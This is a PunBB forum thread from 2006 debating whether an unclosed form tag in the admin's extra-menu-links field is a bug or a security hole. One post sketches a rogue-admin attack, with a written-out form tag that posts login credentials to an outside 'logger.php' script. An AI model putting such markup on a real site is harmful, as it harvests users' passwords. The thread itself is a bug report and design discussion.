1 Topic by mrse0

  • Registered: 2006-06-27
  • Posts: 17

Topic: Unclosed Form tag in navlinks

Not a serious bug, just a big annoyance if you do do it.

A friend tried to add a paypal link to his links ("Additional menu items"), he basically did

<form action="http://paypal.com/..">

as a link, this wouldn't actually work but I think he was just playing around, anyway, the problem is that from then whenever he tried to do anything form related (admin, logging in, registering, etc. etc.) the site just went to paypal.com. I know he shouldn't have added the unclosed form tag, but the problem is that IF you do then it's impossible to actually remove it without editing the header or manually altering the database.

2 Reply by Paul

  • Paul
  • Senior Member
  • Offline
  • From: Wales, UK.
  • Registered: 2003-08-13
  • Posts: 3,089

Re: Unclosed Form tag in navlinks

This isn't a bug, its user error. The instructions for adding additional links make it clear you are supposed to add hyperlinks in the specified format; nowhere do the instructions say you can add any other tags closed or otherwise.

3 Reply by mrse0 (edited by mrse0 2006-06-27 13:31)

  • Registered: 2006-06-27
  • Posts: 17

Re: Unclosed Form tag in navlinks

My point is that it's a user error that, due to the way punbb deals with it, is impossible to fix without some form of editing that is above punbb. Meaning that some users of PunBB (without MySQL/PHP knowledge or perhaps access to MySQL or to modify PHP) could render their PunBB install completely useless with a simple user mistake.

Is that not a bug? I don't think you can dismiss this simply because users should have read the manual..

  • From: Leuven, Belgium
  • Registered: 2005-06-14
  • Posts: 2,653

Re: Unclosed Form tag in navlinks

Not really a bug, no. It's your own fault, f you can't change anything manually, you shouldn't be messing things up =/

5 Reply by mrse0

  • Registered: 2006-06-27
  • Posts: 17

Re: Unclosed Form tag in navlinks

Surely the people incapable of changing things manually or more likely to mess things up?
In this case where it not for me my friend would probably wouldn't have been able to solve his problem..

6 Reply by mrse0 (edited by mrse0 2006-06-27 13:57)

  • Registered: 2006-06-27
  • Posts: 17

Re: Unclosed Form tag in navlinks

O.K. here's a scenario that will surely prove to you guys it's a bug.

Rogue Admin wants to steal usernames and passwords, so he adds a link to <form action="http://hissite.com/logger.php" method="POST">
logger.php is a script that logs all data submitted to it.

Now whenever a user tries to login they submit their login details to the rogue administrators website. I've tested this and it works.

Is that not bugworthy?
Now that it's intentional and not due to user stupidity (which is something that should be considered) will you accept this as a bug?
I admit that rogue administrators aren't likely, but it is quite possible and could result in a lot of stolen usernames and passwords.

  • From: Leuven, Belgium
  • Registered: 2005-06-14
  • Posts: 2,653

Re: Unclosed Form tag in navlinks

Ok, so what do you suggest? A regex check on the input to see if it's a link? And what if I'd like to add a small form in there? Or a <br />? Or and img? Wouldn't be possible anymore.
And I think it'd be quite hard to just check if a tag is closed... =/

8 Reply by mrse0 (edited by mrse0 2006-06-27 14:39)

  • Registered: 2006-06-27
  • Posts: 17

Re: Unclosed Form tag in navlinks

Are you honestly suggesting that a serious security vulnerability shouldn't be fixed because it might be hard to solve?
Surely this is intended only for links and if you did want to add anything else you would simply edit the template.

A solution doesn't come to mind immediately but I think this is a bug that should be considered.

  • From: 127.0.0.1
  • Registered: 2001-11-02
  • Posts: 9,167

Re: Unclosed Form tag in navlinks

I really don't think this is a "serious security vulnerability". I don't think it should be classified as a vulnerability at all. Yes, an administrator can control what markup the forum outputs. What about templates? Couldn't an administrator insert malicious markup in the templates? Yes, he could. An administrator can always find ways to do this and there is no way to stop him from doing so. PunBB is no different from any other forum software in this regard. We have no choice but to trust the administrator. If we don't, well, then don't visit the forum in question.

Having said that, some kind of validation on the contents of that form field is probably in order. Not from a security standpoint, but because ill-formed markup can break the forums. I will put it on the list and have a look at it for 1.3.

"Programming is like sex: one mistake and you have to support it for the rest of your life."

Rickard's Website

10 Reply by mrse0

  • Registered: 2006-06-27
  • Posts: 17

Re: Unclosed Form tag in navlinks

Fair enough, but I disagree with the assumption that the administrator can modify templates, I am an administrator on punbb boards where I have access to nothing but punbb.

  • From: 127.0.0.1
  • Registered: 2001-11-02
  • Posts: 9,167

Re: Unclosed Form tag in navlinks

Well, PunBB is "safe" from that, but most other forums that are template-driven allow administrators to edit the templates from within the admin interface. I guess what I'm saying is, if this should be classed as a vulnerability, then all forum software are vulnerable.

"Programming is like sex: one mistake and you have to support it for the rest of your life."

Rickard's Website